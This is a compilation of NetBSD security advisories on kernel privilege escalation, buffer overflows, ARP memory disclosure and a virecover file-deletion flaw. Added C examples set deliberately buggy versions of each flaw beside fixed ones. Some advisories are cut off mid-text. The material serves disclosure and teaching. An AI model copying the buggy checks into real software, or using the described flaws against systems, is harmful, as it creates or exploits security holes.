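/* Option claiming 6 payload bytes in a 4-byte buffer: OPTS_TRUNCATED, nothing zeroed past the end. */
int demo_truncated(void)
{
    uint8_t opts[] = { 0x26, 0x06, 1, 2 };
    size_t n = 0;
    return ah_zero_mutable_opts(opts, sizeof opts, 2, &n);
}

int main(void)
{
    printf("fixed stride ok: %d\n", demo_fixed_stride());
    printf("buggy stride:    %d (OPTS_STUCK = %d)\n", demo_buggy_stride(), OPTS_STUCK);
    printf("truncated:       %d (OPTS_TRUNCATED = %d)\n", demo_truncated(), OPTS_TRUNCATED);
    return 0;
}
```

Two details worth noticing: Pad1 is the one option type without a length byte, so a walker that always reads `opts[off + 1]` is itself a one-byte over-read on a trailing Pad1; and with the pre-fix stride a non-zero length does not hang but lands the parser inside the payload, where attacker-supplied bytes are reinterpreted as option types.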
NetBSD Security Advisory 2018-002: Local DoS in virecover
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

                 NetBSD Security Advisory 2018-002
                 =================================

Topic:          Local DoS in virecover

Version:        NetBSD-current:         source prior to Sat, November 4th 2017
                NetBSD 7.0 - 7.0.2:     affected
                NetBSD 6.1 - 6.1.5:     affected
                NetBSD 6.0 - 6.0.6:     affected

Severity:       Local Denial of Service

Fixed:          NetBSD-current:         Sat, November 4th 2017
                NetBSD-6-0 branch:      Sun, November 5th 2017
                NetBSD-6-1 branch:      Sun, November 5th 2017
                NetBSD-6 branch:        Sun, November 5th 2017
                NetBSD-7-0 branch:      Sun, November 5th 2017
                NetBSD-7 branch:        Sun, November 5th 2017
                NetBSD-8 branch:        Sun, November 5th 2017

Please note that NetBSD releases prior to 6.0 are no longer supported.
It is recommended that all users upgrade to a supported release.


Abstract
========

An error in the virecover script allows an unprivileged user to delete
any files in the root / directory.


Technical Details
=================

The virecover shell script used file globbing without arranging for
whitespace within filenames to be preserved. Instead of treating a
filename containing a space as a single name, it treats it as two files.
For example, given a file named "/var/tmp/virecover/vi. netbsd",
virecover treats it as two files: /var/tmp/virecover/vi. and netbsd.
As virecover attempts to delete the recovery files, it deletes files in
its current working directory (the root directory). This allows an
unprivileged user to delete any file within the root directory.


Solutions and Workarounds
=========================

Disabling virecover:

    # echo "virecover=NO" >> /etc/rc.conf

Updating nvi:

FILE                                        HEAD  netbsd-8  netbsd-7  netbsd-7-1  netbsd-7-0
----                                        ----  --------  --------  ----------  ----------
external/bsd/nvi/dist/common/recover.c      1.9   1.5.22.1  1.5.6.1   1.5.18.1    1.5.10.1
external/bsd/nvi/usr.bin/recover/virecover  1.3   1.1.22.1  1.1.6.1   1.1.18.1    1.1.10.1

FILE                                        netbsd-6  netbsd-6-1  netbsd-6-0
----                                        --------  ----------  ----------
dist/nvi/common/recover.c                   1.3.10.1  1.3.24.1    1.3.16.1
usr.bin/nvi/recover/virecover               1.1.22.1  1.1.36.1    1.1.28.1

For netbsd-7, -7-0, -7-1, netbsd-8, HEAD:

    $ cd src
    $ cvs update -d -P -r VERSION external/bsd/nvi/dist/common/recover.c
    $ cvs update -d -P -r VERSION external/bsd/nvi/usr.bin/recover/virecover
    $ cd external/bsd/nvi
    $ make USETOOLS=no
    # make install USETOOLS=no

For netbsd-6, -6-0, -6-1:

    $ cd src
    $ cvs update -d -P -r VERSION dist/nvi/common/recover.c
    $ cvs update -d -P -r VERSION usr.bin/nvi/recover/virecover
    $ cd usr.bin/nvi
    $ make USETOOLS=no
    # make install USETOOLS=no


Thanks To
=========

Maya Rashish for noticing the issue, Christos Zoulas and Robert Elz for
deploying the fix.


Revision History
================

    2018-01-02  Initial release


More Information
================

Advisories may be updated as new information becomes available.

The most recent version of this advisory (PGP signed) can be found at
    http://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2018-002.txt.asc

Information about NetBSD and NetBSD security can be found at
    http://www.NetBSD.org/
    http://www.NetBSD.org/Security/


Copyright 2018, The NetBSD Foundation, Inc.  All Rights Reserved.
Redistribution permitted only in full, unmodified form.
-BEGIN PGP SIGNATURE- iQIcBAEBAgAGBQJaS7+UAAoJEAZJc6xMSnBuqhgQAJHCyUMeylnsOUGi0SzsZ/G9 kzQVGSir6+U+yKGaEFM5xkuRUoQFOVxCcHo9GXxY5EvxfF3rsYoW6MORzkn5DXAs Yup1HMb5impVdGruED7ubFI155EjLtlI03S3fqgOChH0g1aWwtfP0PlqC1iMl7mp Ygyo7UZEJNOsrAM28WqW5LHQPNVG2q92yl16UwP6UWH8MoydnjCj4WuQ4/D161bQ xFDNgxruxt3R3RqwBnVIPYBRTlxM9xPGpW/dNngc+rVoiyRD3+XzcEvhemY2Eccx Gqp2ohQl+q8rDzKnS2pv+wNdQlgXZVkg5XrfWkP52JBTdAojAfeNP9cWlOoV9ggZ nFzjHnURkodRwosE8AWuJ+aquokqUMtec48NNKVIaRK/LPuJQLz/CWdiM5V0xwqY 0WSK5Yvgl3aM5FwFpWFo78RE3Pl18FaJuqMN3XYWhDuBXLZW7raQK0KXQuWC+E72 PgRqqDU2YswGV3Gt2xbBh74SBnedjwppffNCenSdxjZHjfpFLGr1sS/JGBj/UG1m RfxAA7mbogE/yEjWXLyt8H+y78Id6Ck9rWiKTFUKBXJw7qw05opdewJDsZrOsw6T 40iydSOLl1ahr/Ke2Mu8/B09MUyt8MMrrmthnhoXQr9a2R9iR1fDFxfboocOVCfn BHDNhoPO+m+GSApcBd7p =MHk1 -END PGP SIGNATURE-
NetBSD Security Advisory 2018-001: Several vulnerabilities in context handling
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

                 NetBSD Security Advisory 2018-001
                 =================================

Topic:          Several vulnerabilities in context handling

Version:        NetBSD-current:         source prior to Sat, Sep 2nd 2017
                NetBSD 7.1:             affected
                NetBSD 7.0 - 7.0.2:     affected
                NetBSD 6.1 - 6.1.4:     affected
                NetBSD 6.0 - 6.0.5:     affected

Severity:       Privilege escalation / Local DoS

Fixed:          NetBSD-current:         Sat, Sep 2nd 2017
                NetBSD-7-1 branch:      Sun, Oct 1st 2017
                NetBSD-7-0 branch:      Sun, Oct 1st 2017
                NetBSD-7 branch:        Sun, Oct 1st 2017
                NetBSD-6-1 branch:      Fri, Oct 13th 2017
                NetBSD-6-0 branch:      Fri, Oct 13th 2017
                NetBSD-6 branch:        Fri, Oct 13th 2017

Teeny versions released later than the fix date will contain the fix.

Please note that NetBSD releases prior to 6.0 are no longer supported.
It is recommended that all users upgrade to a supported release.


Abstract
========

Three issues were discovered in three ports of NetBSD:

1) sparc64: A missing mask in a syscall could allow userland to control a
   few bits of a privileged register, allowing privilege escalation.

2) amd64: A subtle mistake in compat_linux32 could allow userland to
   generate a particular fault in kernel mode, which caused the kernel to
   get confused and re-enter itself in kernel mode but with the userland
   Thread-Local Storage. This allowed privilege escalation.

3) i386: An instruction in the #UD exception handler was implicitly using
   the userland %ds register without sanitizing it. This allowed at least
   local DoS.


Technical Details
=================

1) A mistake in a syscall allowed an unprivileged user process to set
   privileged bits, such as PSTATE_PRIV, in the %pstate register. Upon
   return to userland the process would then be granted kernel privileges
   on the hardware.

2) The handling of the GDT on amd64 creates a condition where a page fault
   can be generated if a segment register is reloaded with a "high"
   selector, located near the end of the GDT. An incorrect check in a
   linux32 syscall allowed unprivileged user processes to make the kernel
   page fault under such a condition. However, the kernel does not
   correctly handle such exceptions: it re-enters itself but does not
   switch to the kernel TLS, and instead keeps using userland's. Userland
   therefore had a way to control a generic kernel pointer, which allowed
   for full privilege escalation.

3) The #UD exception handler was implicitly using the %ds register before
   it actually initialized it to the kernel value. This allowed userland
   to crash the system.


Solutions and Workarounds
=========================

For all NetBSD versions, you need to obtain fixed kernel sources,
rebuild and install the new kernel, and reboot the system.

The fixed source may be obtained from the NetBSD CVS repository.
The following instructions briefly summarize how to upgrade your
kernel. In these instructions, replace:

    ARCH      with your architecture (from uname -m),
    KERNCONF  with the name of your kernel configuration file and
    VERSION   with the file version below

File versions containing the fixes:

FILE                                              HEAD   netbsd-7    netbsd-7-0  netbsd-7-1
----                                              ----   --------    ----------  ----------
sys/arch/sparc64/sparc64/compat_13_machdep.c      1.24   1.23.38.1   1.23.42.1   1.23.50.1
sys/compat/linux32/arch/amd64/linux32_machdep.c   1.39   1.36.4.1    1.36.8.1    1.36.14.1
sys/arch/i386/i386/i386_trap.S                    1.12   1.5.6.1     1.5.12.1    1.5.20.1

FILE                                              netbsd-6    netbsd-6-0  netbsd-6-1
----                                              --------    ----------  ----------
sys/arch/sparc64/sparc64/compat_13_machdep.c      1.23.18.1   1.23.24.1   1.23.32.1
sys/compat/linux32/arch/amd64/linux32_machdep.c   1.29.10.1   1.29.14.1   1.29.16.1
sys/arch/i386/i386/vector.S                       1.59.8.1    1.59.12.1   1.59.14.1

Note: in NetBSD 6, the fix for 3) is in a different file.

To update from CVS, re-build, and re-install the kernel:

    # cd src
    # cvs update -d -P -r VERSION sys/arch/sparc64/sparc64/compat_13_machdep.c
    # cvs update -d -P -r VERSION sys/compat/linux32/arch/amd64/linux32_machdep.c

then, either

    # cvs update -d -P -r VERSION sys/arch/i386/i386/i386_trap.S

or

    # cvs update -d -P -r VERSION sys/arch/i386/i386/vector.S

    # ./build.sh kernel=KERNCONF
    # mv /netbsd /netbsd.old
    # cp sys/arch/ARCH/compile/obj/KERNCONF/netbsd /netbsd
    # shutdown -r now

For more information on how to do this, see:

    http://www.NetBSD.org/guide/en/chap-kernel.html


Thanks To
=========

Maxime
NetBSD Security Advisory 2017-006: Vnode reference leak in the openat system call
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

                 NetBSD Security Advisory 2017-006
                 =================================

Topic:          Vnode reference leak in the openat system call

Version:        NetBSD-current:         source prior to Sun, July 9th 2017
                NetBSD 8.0 beta:        affected
                NetBSD 7.1:             affected
                NetBSD 7.0 - 7.0.2:     affected
                NetBSD 6.1 - 6.1.4:     not affected
                NetBSD 6.0 - 6.0.5:     not affected

Severity:       Local privilege escalation

Fixed:          NetBSD-current:         Sun, July 9th 2017
                NetBSD-8 branch:        Mon, July 10th 2017
                NetBSD-7-1 branch:      Mon, July 10th 2017
                NetBSD-7-0 branch:      Mon, July 10th 2017
                NetBSD-7 branch:        Mon, July 10th 2017

Teeny versions released later than the fix date will contain the fix.

Please note that NetBSD releases prior to 6.0 are no longer supported.
It is recommended that all users upgrade to a supported release.


Abstract
========

An easily exercisable error path in the kernel leaves behind an
unreclaimed reference to a vnode. This prevents unmounting the affected
volume, allowing local denial of service. It is likely that tickling the
weakness repeatedly can be used to corrupt the kernel heap and thus gain
kernel-level privileges, even with securelevel enabled.


Technical Details
=================

When the openat system call is invoked with a file descriptor that does
not name a directory as the starting point for path lookup, a reference
to the underlying vnode is taken temporarily and then not released when
the error is discovered. Performing such a call often enough overflows
the internal reference count and corrupts the kernel heap.


Solutions and Workarounds
=========================

For all NetBSD versions, you need to obtain fixed kernel sources,
rebuild and install the new kernel, and reboot the system.

The fixed source may be obtained from the NetBSD CVS repository.
The following instructions briefly summarise how to upgrade your
kernel. In these instructions, replace:

    ARCH      with your architecture (from uname -m),
    KERNCONF  with the name of your kernel configuration file and
    VERSION   with the file version below

File versions containing the fixes:

FILE                    HEAD    netbsd-8    netbsd-7    netbsd-7-1   netbsd-7-0
----                    ----    --------    --------    ----------   ----------
sys/kern/vfs_lookup.c   1.208   1.207.2.1   1.201.4.1   1.201.12.1   1.201.8.1

To update from CVS, re-build, and re-install the kernel:

    # cd src
    # cvs update -d -P -r VERSION sys/kern/vfs_lookup.c
    # ./build.sh kernel=KERNCONF
    # mv /netbsd /netbsd.old
    # cp sys/arch/ARCH/compile/obj/KERNCONF/netbsd /netbsd
    # shutdown -r now

For more information on how to do this, see:

    http://www.NetBSD.org/guide/en/chap-kernel.html


Thanks To
=========

Mateusz Guzik for noticing the issue, and David A. Holland for deploying
the fix.


Revision History
================

    2017-09-08  Initial release


More Information
================

Advisories may be updated as new information becomes available.

The most recent version of this advisory (PGP signed) can be found at
    http://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2017-00N.txt.asc

Information about NetBSD and NetBSD security can be found at
    http://www.NetBSD.org/
    http://www.NetBSD.org/Security/


Copyright 2017, The NetBSD Foundation, Inc.  All Rights Reserved.
Redistribution permitted only in full, unmodified form.
-BEGIN PGP SIGNATURE- iQIcBAEBAgAGBQJZsqisAAoJEAZJc6xMSnBuu4AP/0ytQhuSMf1hjvg5Gdg9TT5N 4anruzy9VY6P4PqkPVjJTv7YYlOCTtP7Svg4+CbwIjRoNNyKycUhEmBzUWpmLQL1 UaKE44lJExbD1qIL4aU5LweD+RnGQbdo9LwMC31rK8dUSKCpkc6K7yt+TnA2SMw/ a2IlJtqkX5lk+HAQ3TF32STPz+oijtEJBFjTCzWw4uLpAbvvdephuzQRR4H3d324 3iD0pcLRblpOAZ7qeOG6iCcpemMxu33T2IphsNL1Sx2JyKmqObtyRoNU8O6V7ldP L1VGIAU5cNW6+zCbvKLyTKLbze5eRuGx5x/fLbHnjlodGrdshxzIqEUVUGyD+hJJ JP1pYo3Mj/BJwnjLhv8hNWyuX6VtnEgl0B5C2U7X2K5c05DZnRvSrSHrIiGjIEoV p7LvbgLXtIEdzpOrx4kZ5DoHAVAjBm0gLrVwK1r8nSgOPmEzLpzaC3fCCL/x4cfZ JfMJvA3QbQJOpNdOexDcr1eD7VUFpZE7mE6kI8UUCpF71446A3cGpMkftSt/i6vn htDCqnmYJ10w2NtRc99VGIdgUZUM7d3as83HGKrHcTous0qKyutrB+WlEpGHIRY5 mq7gCoRqikbxBKhnYlADGJRXTk9FBw2ai08SIOsRW7SSlVNwtPq09xhT0X6NsKA0 IsQfy4QZa1g+ecssqDHg =5ckQ -END PGP SIGNATURE-
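The error path described in NetBSD-SA2017-006 above, as an added example that is not NetBSD's vfs_lookup.c: a toy vnode with a use count, the start of a descriptor-relative lookup that takes a reference and then returns ENOTDIR without dropping it, and the corrected variant. The struct, the helper names and the assumption that the count is a 32-bit integer are this example's own; the driver function shows how each failed call leaves one reference behind, which is what "often enough" in the advisory accumulates toward a wrap of the counter.

```c
#include <errno.h>
#include <stdint.h>
#include <stdio.h>

/* Toy vnode: just the type and a 32-bit use count (example structure, not sys/vnode.h). */
enum vtype { VREG, VDIR };
struct vnode {
    enum vtype v_type;
    uint32_t   v_usecount;
};

static void vref(struct vnode *vp)  { vp->v_usecount++; }
static void vrele(struct vnode *vp) { vp->v_usecount--; }

/* Start of a descriptor-relative lookup, as openat(fd, "name", ...) needs.
 * fixed == 0 models the error path from the advisory: a reference is taken on the
 * descriptor's vnode, the non-directory check fails, and the function returns
 * ENOTDIR without dropping that reference. fixed == 1 releases it first. */
int lookup_start(struct vnode *dvp, int fixed)
{
    vref(dvp);                             /* hold dvp while we look at it */
    if (dvp->v_type != VDIR) {
        if (fixed)
            vrele(dvp);                    /* the missing release */
        return ENOTDIR;
    }
    /* ... a real lookup would proceed from dvp here ... */
    vrele(dvp);
    return 0;
}

/* Hit the error path `calls` times on a regular file that starts with one
 * reference (its open descriptor) and report how many references are left over. */
uint32_t leaked_refs_after(uint32_t calls, int fixed)
{
    struct vnode file = { VREG, 1 };       /* constructed: regular file, one opener */
    for (uint32_t i = 0; i < calls; i++)
        lookup_start(&file, fixed);
    return file.v_usecount - 1;
}

/* The non-error path is balanced in both variants. */
int dir_lookup_balanced(int fixed)
{
    struct vnode dir = { VDIR, 1 };
    return lookup_start(&dir, fixed) == 0 && dir.v_usecount == 1;
}

int main(void)
{
    printf("refs leaked after 1000 failing openat calls, pre-fix: %u\n",
           leaked_refs_after(1000, 0));
    printf("refs leaked after 1000 failing openat calls, fixed:   %u\n",
           leaked_refs_after(1000, 1));
    return 0;
}
```

A vnode whose count never returns to its true value cannot be reclaimed, which is the unmount denial of service; once the counter wraps past its maximum the kernel's view of who still holds the vnode is wrong, which is the heap-corruption path the advisory points at.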
NetBSD Security Advisory 2017-005: x86: vulnerabilities in context handling
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

                 NetBSD Security Advisory 2017-005
                 =================================

Topic:          x86: vulnerabilities in context handling

Version:        NetBSD-current:         source prior to Sun, Jul 1st 2017
                NetBSD 7.1:             affected
                NetBSD 7.0 - 7.0.2:     affected
                NetBSD 6.1 - 6.1.4:     affected
                NetBSD 6.0 - 6.0.5:     affected

Severity:       Privilege escalation / Local DoS

Fixed:          NetBSD-current:         Sun, Jul 1st 2017
                NetBSD-7-1 branch:      Thu, Jul 20th 2017
                NetBSD-7-0 branch:      Thu, Jul 20th 2017
                NetBSD-7 branch:        Thu, Jul 20th 2017
                NetBSD-6-1 branch:      Tue, Aug 8th 2017
                NetBSD-6-0 branch:      Tue, Aug 8th 2017
                NetBSD-6 branch:        Tue, Aug 8th 2017

Teeny versions released later than the fix date will contain the fix.

Please note that NetBSD releases prior to 6.0 are no longer supported.
It is recommended that all users upgrade to a supported release.


Abstract
========

Three issues were discovered in the i386 and amd64 ports of NetBSD:

1) A missing check in the trap handler could allow userland to panic an
   i386 kernel.

2) A race condition could allow userland to panic an i386 kernel, and
   escalate privileges on amd64.

3) A missing check in the Linux compatibility layer could allow userland
   to exploit the Intel Sysret Vulnerability on amd64.


Technical Details
=================

1) Under certain circumstances, userland can legitimately make the kernel
   generate a stack fault when executing 'iret'. However, the appropriate
   check was missing in the trap handler, and this fault could lead to a
   panic.

2) A call gate existed on both i386 and amd64 to allow binaries from
   previous releases to perform syscalls. However, call gates do not
   automatically disable interrupts when entering the target function.
   Therefore, there was a window in which the kernel executed with
   userland registers loaded and interrupts enabled, which breaks a number
   of assumptions in the i386 and amd64 implementations. On i386 this can
   lead to a panic, and on amd64 to a privilege escalation.

3) A missing check on the trap frame could allow userland to have the
   kernel execute 'sysret' with a fully-controllable %rip, thereby
   allowing the exploitation of the Intel Sysret Vulnerability (see
   NetBSD-SA2012-003).


Solutions and Workarounds
=========================

For all NetBSD versions, you need to obtain fixed kernel sources,
rebuild and install the new kernel, and reboot the system.

The fixed source may be obtained from the NetBSD CVS repository.
The following instructions briefly summarise how to upgrade your
kernel. In these instructions, replace:

    ARCH      with your architecture (from uname -m),
    KERNCONF  with the name of your kernel configuration file and
    VERSION   with the file version below

File versions containing the fixes:

FILE                                          HEAD    netbsd-7     netbsd-7-0   netbsd-7-1
----                                          ----    --------     ----------   ----------
sys/arch/i386/i386/trap.c                     1.288   1.272.4.2    1.272.6.2    1.272.10.2
sys/arch/i386/i386/locore.S                   1.146   1.112.4.1    1.112.6.1    1.112.10.1
sys/arch/i386/i386/machdep.c                  1.783   1.752.4.1    1.752.8.1    1.752.12.1
sys/arch/amd64/amd64/trap.c                   1.96    1.78.4.3     1.78.6.3     1.78.10.3
sys/arch/amd64/amd64/locore.S                 1.124   1.76.2.2     1.76.4.2     1.76.8.2
sys/arch/amd64/amd64/machdep.c                1.254   1.211.2.1    1.211.6.1    1.211.10.1
sys/compat/linux/arch/amd64/linux_machdep.c   1.51    1.48.4.1     1.48.8.1     1.48.4.1

FILE                                          netbsd-6     netbsd-6-0       netbsd-6-1
----                                          --------     ----------       ----------
sys/arch/i386/i386/trap.c                     1.262.8.2    1.262.12.2       1.262.14.2
sys/arch/i386/i386/locore.S                   1.95.10.4    1.95.10.2.4.1    1.95.10.3.2.1
sys/arch/i386/i386/machdep.c                  1.717.2.8    1.717.2.7.4.1    1.717.2.7.6.1
sys/arch/amd64/amd64/trap.c                   1.69.2.3     1.69.2.1.4.2     1.69.2.1.6.2
sys/arch/amd64/amd64/locore.S                 1.66.2.2     1.66.2.1.4.1     1.66.2.1.6.1
sys/arch/amd64/amd64/machdep.c                1.175.2.9    1.175.2.7.2.2    1.175.2.8.2.1
sys/compat/linux/arch/amd64/linux_machdep.c   1.39.6.1     1.39.10.1        1.39.12.1

To update from CVS, re-build, and re-install the kernel:

    # cd src
    # cvs update -d -P -r VERSION sys/arch/i386/i386/trap.c
    # cvs update -d -P -r VERSION sys/arch/i386/i386/locore.S
    # cvs update -d -P -r VERSION sys/arch/i386/i386/machdep.c
    # cvs update -d -P -r VERSION sys/arch/amd64/amd64/trap.c
    # cvs update -d -P -r VERSION
NetBSD Security Advisory 2017-004: buffer overflow via cmap for 4 graphics drivers
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

                 NetBSD Security Advisory 2017-004
                 =================================

Topic:          buffer overflow via cmap for 4 graphics drivers

Version:        NetBSD-current:         source prior to June 13th
                NetBSD 8.0_BETA:        affected
                NetBSD 7.1:             affected
                NetBSD 7.0 - 7.0.2:     affected
                NetBSD 6.1 - 6.1.5:     affected
                NetBSD 6.0 - 6.0.6:     affected

Severity:       information leak and potential root compromise for an
                authenticated user on an affected graphics console

Fixed:          NetBSD-current:         June 13th
                NetBSD-8 branch:        June 15th
                NetBSD-7-1 branch:      June 15th
                NetBSD-7-0 branch:      June 15th
                NetBSD-7 branch:        June 15th
                NetBSD-6-0 branch:      June 15th
                NetBSD-6-1 branch:      June 15th
                NetBSD-6 branch:        June 15th

Teeny versions released later than the fix date will contain the fix.

Please note that NetBSD releases prior to 6.0 are no longer supported.
It is recommended that all users upgrade to a supported release.


Abstract
========

An authenticated user on a wscons terminal with one of the following
graphics drivers:

    sbd      (ews4800mips)
    bivideo  (hpcsh)
    sti      (hppa and hp300)
    pm       (pmax)

could cause a buffer overflow when reading or writing the color map.


Technical Details
=================

Because the bounds checks performed when reading or writing the color map
with the WSDISPLAYIO_GETCMAP and WSDISPLAYIO_PUTCMAP ioctls could be made
to overflow, the user who owns a /dev/ttyE* (i.e. is logged in on it)
could read kernel memory, or, for all drivers but bivideo, which doesn't
have a writable color map, write kernel memory.


Solutions and Workarounds
=========================

Solution: update the kernel with one built from source past the fix date.

There are no workarounds besides the obvious one of not allowing
untrusted users at the console.

Affected source files and fix versions:

FILE                                   HEAD   netbsd-8
----                                   ----   --------
sys/arch/ews4800mips/sbd/fb_sbdio.c    1.16   1.15.10.1
sys/arch/pmax/ibus/pm.c                1.13   1.12.22.1
sys/dev/hpc/bivideo.c                  1.34   1.33.30.1
sys/dev/ic/sti.c                       1.19   1.18.20.1

FILE                                   netbsd-7    netbsd-7-1     netbsd-7-0
----                                   --------    ----------     ----------
sys/arch/ews4800mips/sbd/fb_sbdio.c    1.13.4.2    1.13.4.1.6.1   1.13.4.1.2.1
sys/arch/pmax/ibus/pm.c                1.12.4.1    1.12.16.1      1.12.8.1
sys/dev/hpc/bivideo.c                  1.33.12.1   1.33.24.1      1.33.16.1
sys/dev/ic/sti.c                       1.18.2.1    1.18.14.1      1.18.6.1

FILE                                   netbsd-6    netbsd-6-1     netbsd-6-0
----                                   --------    ----------     ----------
sys/arch/ews4800mips/sbd/fb_sbdio.c    1.12.2.1    1.12.16.1      1.12.8.1
sys/arch/pmax/ibus/pm.c                1.11.2.1    1.11.16.1      1.11.8.1
sys/dev/hpc/bivideo.c                  1.32.14.1   1.32.22.1      1.32.20.1
sys/dev/ic/sti.c                       1.16.8.2    1.16.22.1      1.16.14.1


Thanks To
=========

Thanks to CTurt for reporting this set of issues.


Revision History
================

    2017-09-08  Initial release


More Information
================

Advisories may be updated as new information becomes available.

The most recent version of this advisory (PGP signed) can be found at
    http://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2017-004.txt.asc

Information about NetBSD and NetBSD security can be found at
    http://www.NetBSD.org/
    http://www.NetBSD.org/Security/


Copyright 2015, The NetBSD Foundation, Inc.  All Rights Reserved.
Redistribution permitted only in full, unmodified form.
$NetBSD: NetBSD-SA2017-004.txt,v 1.1 2017/09/08 14:16:20 christos Exp $ -BEGIN PGP SIGNATURE- iQIcBAEBAgAGBQJZsqZUAAoJEAZJc6xMSnBulOkP+QHLJsIE+54s6iAc9p45tnT7 mLVFvATsLyb4Vu4BJ82swC0AJqpHTjUBQgAmYR+C6xHzewyd95Uimgb5C6hnpXb9 f7EcZ/9AiQzVusEp4EfjyBJB5bze9W4tbZOfLNJ41kZyoUAlg2gQdd70Oz4lW5CQ 6ENcYqXgoUqsLA2MF8lcFhAbuTaBY9vzbQOAfviGtguTCmoEZ9ZcknAnNO0G+0Kk RCnu/P333Z0X7m/vHMQ9YJQyHjSGQFii0Ssyl+FgKQw3Qdhs+SRGE7XhEDjDTBGU dm25XrdDcRFrW0YlCnEInXqMHvrjtPAfwZ9glRElgXgcU3tld1Gynz6e3u1SmL2C 76G3ZlDabovJNLRs4GOcAofEsUN4KWBxemOUFPzuMx0vM6yv+r71+DdcFYVIRgrl 6KgoqvcTGL6n2MphLKy4+dBytuIue83RSqNNhdliTLmlRy/jUWOXGWXanOjaGv/E bYKTeELHZ5uDzi4HZ6nO9qjazskUz3+CvbSmJmzDTa+FNYAbiuNHzW9jUD2wk8TE GP2bEh0lF8Sw1FY8TRKPUldr5s/STbdAGjISC/128AuT6a2S+bq+zIidIOMa4FhP etzb43qjA41t5FG01tTUW3SDmI6s1svyhzSYySFF6HsbJ2roF9zS8DFtk09pwa/k WwGwp4kZJGaJPRNplTkB =m2H9 -END PGP SIGNATURE-
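The overflowable bounds check from NetBSD-SA2017-004 above, as an added example that is not any of the four drivers' code: a color-map request with an index and a count, a pre-fix style check whose `index + count` sum is computed in unsigned arithmetic and can wrap, and the corrected form that bounds each operand separately. The exact expression the drivers used is an assumption here (only that it was "overflowable" is in the advisory); the struct, the 256-entry red channel and the request values are constructed for the example.

```c
#include <errno.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define CMAP_SIZE 256u                  /* entries per channel in this example */

/* Kernel-side red channel of the colour map (one channel is enough to show the bug). */
static uint8_t cmap_red[CMAP_SIZE];

/* Shape of a GETCMAP/PUTCMAP request: first entry and number of entries. */
struct cmap_req {
    unsigned int index;
    unsigned int count;
};

/* Pre-fix style check (assumption: the exact expression differed per driver).
 * index + count is computed in unsigned arithmetic, so a huge count wraps the sum
 * below CMAP_SIZE, the check passes, and the copy that follows runs far outside
 * the array: a read for GETCMAP, a write for PUTCMAP. */
int cmap_check_buggy(const struct cmap_req *r)
{
    if (r->index + r->count > CMAP_SIZE)
        return EINVAL;
    return 0;
}

/* Corrected check: bound index first, then bound count by the remaining room, so
 * no addition can wrap. */
int cmap_check_fixed(const struct cmap_req *r)
{
    if (r->index >= CMAP_SIZE || r->count > CMAP_SIZE - r->index)
        return EINVAL;
    return 0;
}

/* GETCMAP-style copy behind the fixed check: bytes copied, or -EINVAL. */
int cmap_get_red(const struct cmap_req *r, uint8_t *dst)
{
    int error = cmap_check_fixed(r);
    if (error)
        return -error;
    memcpy(dst, cmap_red + r->index, r->count);
    return (int)r->count;
}

int main(void)
{
    struct cmap_req wrap = { 1u, 0xFFFFFFFFu };    /* index + count wraps to 0 */
    struct cmap_req last = { 250u, 6u };           /* exactly the last six entries */
    uint8_t buf[6];

    printf("wrapping request: buggy check %s, fixed check %s\n",
           cmap_check_buggy(&wrap) ? "rejects" : "ACCEPTS",
           cmap_check_fixed(&wrap) ? "rejects" : "accepts");
    printf("last six entries: copied %d bytes\n", cmap_get_red(&last, buf));
    return 0;
}
```

The wrapping request is the whole story: `1 + 0xFFFFFFFF` is 0 in 32-bit unsigned arithmetic, so the buggy check sees a request that ends before it starts and lets it through. Writing the check as "index in range, then count no larger than what remains" is the pattern to reach for whenever a user-controlled offset and length are validated together.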
NetBSD Security Advisory 2017-002: Several vulnerabilities in ARP
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

                 NetBSD Security Advisory 2017-002
                 =================================

Topic:          Several vulnerabilities in ARP

Version:        NetBSD-current:         source prior to Tue, Jan 24th 2017
                NetBSD 7.0 - 7.0.2:     affected
                NetBSD 6.1 - 6.1.4:     affected
                NetBSD 6.0 - 6.0.5:     affected

Severity:       Remote DoS, remote information disclosure

Fixed:          NetBSD-current:         Tue, Jan 24th 2017
                NetBSD-7-0 branch:      Sun, Feb 5th 2017
                NetBSD-7 branch:        Sun, Feb 5th 2017
                NetBSD-6-0 branch:      Sun, Feb 5th 2017
                NetBSD-6-1 branch:      Sun, Feb 5th 2017
                NetBSD-6 branch:        Sun, Feb 5th 2017

Teeny versions released later than the fix date will contain the fix.

Please note that NetBSD releases prior to 6.0 are no longer supported.
It is recommended that all users upgrade to a supported release.

Abstract
========

Two vulnerabilities were found in NetBSD's ARP implementation:

 - A memory leak could allow an attacker to remotely cause the system to
   run out of memory and eventually panic.

 - Missing validation checks on a received ARP packet header could cause
   the system to reply with uninitialized kernel data, which may lead to
   information disclosure.

Technical Details
=================

 - When replying to an ARP request, a particular branch taken in the
   output code did not free the mbuf that was being sent. An attacker
   could send specially-crafted ARP requests that trigger this memory
   leak.

 - When processing a received ARP request, the system did not properly
   check the hardware and protocol lengths in the ARP header. Because
   these fields are used as copy lengths in the memcpys that build the
   reply, an attacker could send an ARP packet with the highest encodable
   lengths and cause the kernel to copy more data into the reply packet
   than is available. It has been demonstrated that a remote machine can
   thereby retrieve 249 bytes of kernel memory over an Ethernet link.

Solutions and Workarounds
=========================

For all NetBSD versions, you need to obtain fixed kernel sources,
rebuild and install the new kernel, and reboot the system.

The fixed source may be obtained from the NetBSD CVS repository.
The following instructions briefly summarise how to upgrade your
kernel. In these instructions, replace:

  ARCH      with your architecture (from uname -m),
  KERNCONF  with the name of your kernel configuration file and
  VERSION   with the file version below

File versions containing the fixes:

FILE                    HEAD    netbsd-7    netbsd-7-0      netbsd-6    netbsd-6-1      netbsd-6-0
----                    ----    --------    ----------      --------    ----------      ----------
sys/netinet/if_arp.c    1.239   1.158.2.2   1.158.4.1       1.154.2.3   1.154.16.2      1.154.8.2
sys/net/if_arcsubr.c    1.76    1.66.2.1    1.66.6.1        1.63.14.2   1.63.14.1.2.1   1.63.20.1
sys/net/if_ecosubr.c    1.50    1.40.2.2    1.40.2.1.2.1    1.36.4.2    1.36.18.1       1.36.10.1
